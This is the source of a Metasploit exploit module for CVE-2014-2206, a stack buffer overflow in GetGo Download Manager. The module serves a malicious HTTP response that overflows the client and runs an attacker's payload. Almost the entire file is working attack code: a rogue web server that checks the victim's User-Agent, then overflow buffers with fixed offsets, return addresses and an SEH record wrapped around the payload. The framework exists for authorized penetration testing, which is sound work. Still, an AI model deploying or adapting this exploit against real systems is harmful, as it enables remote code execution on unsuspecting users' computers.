modules/exploits/windows/browser/getgodm_http_response_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 5.3.0.2712 earlier, caused by an
overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julien Ahrens', # Vulnerability discovery
'Gabor Seljan', # Metasploit module for v4
'bzyo', # Metasploit module for v5
'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642)
],
'References' =>
[
[ 'EDB', '32132' ],
[ 'OSVDB', '103910' ],
[ 'CVE', '2014-2206' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'URIPATH' => "/shakeitoff.mp3"
},
'Platform' => 'win',
'Payload' =>
{
# v5 has no bad chars
'BadChars' => "\x00\x0a\x0d"
},
'Targets' =>
[
[
'Automatic', {}
],
[ '4.9.0.1982 on Windows XP SP3',
{
'Offset' => 4107,
'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
}
],
[
'5.3.0.2712 on Windows XP SP3',
{
'Offset' => 4095,
# 0:016> u 0x72d11f39
# msacm32!wodMessage+0xd0f:
# 72d11f39 5f pop edi
# 72d11f3a 5e pop esi
# 72d11f3b c20400 ret 4
'Ret' => 0x72d11f39,
# 12253 is the same size the python PoC used
'MaxSize' => 12253
}
]
],
'Privileged' => false,
'DisclosureDate' => '2014-03-09',
'DefaultTarget' => 0))
end
# This part is from Gabor Seljan
def exploit_v4(cli, current_taget)
sploit = rand_text_alpha(current_taget['Offset'])
sploit << "\x90\x90\xEB\x06"
sploit << [current_taget.ret].pack('V')
sploit << payload.encoded
print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
resp = create_response(200, sploit)
resp.body = ""
cli.send_response(resp)
end
# This part is from Auxilus with some help from @_sinn3r
def exploit_v5(cli, current_taget)
seh_record = generate_seh_record(current_taget.ret)
# Minus 4 for the SEH record
buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
buffer << seh_record
buffer << payload.encoded
buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
res = create_response(200, buffer)
cli.send_response(res)
end
def on_request_uri(cli, request)
print_status("#{cli.peerhost} connected")
current_target = target
user_agent = request.headers['User-Agent'].to_s
if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
print_status('Attempting to exploit against v4')
current_target = targets[1]
exploit_v4(cli, current_target)
elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
print_status('Attempting to exploit against v5')
current_target = targets[2]
exploit_v5(cli, current_target)
else
print_error('Sending 404 for unknown user-agent')
send_not_found(cli)
end
end
end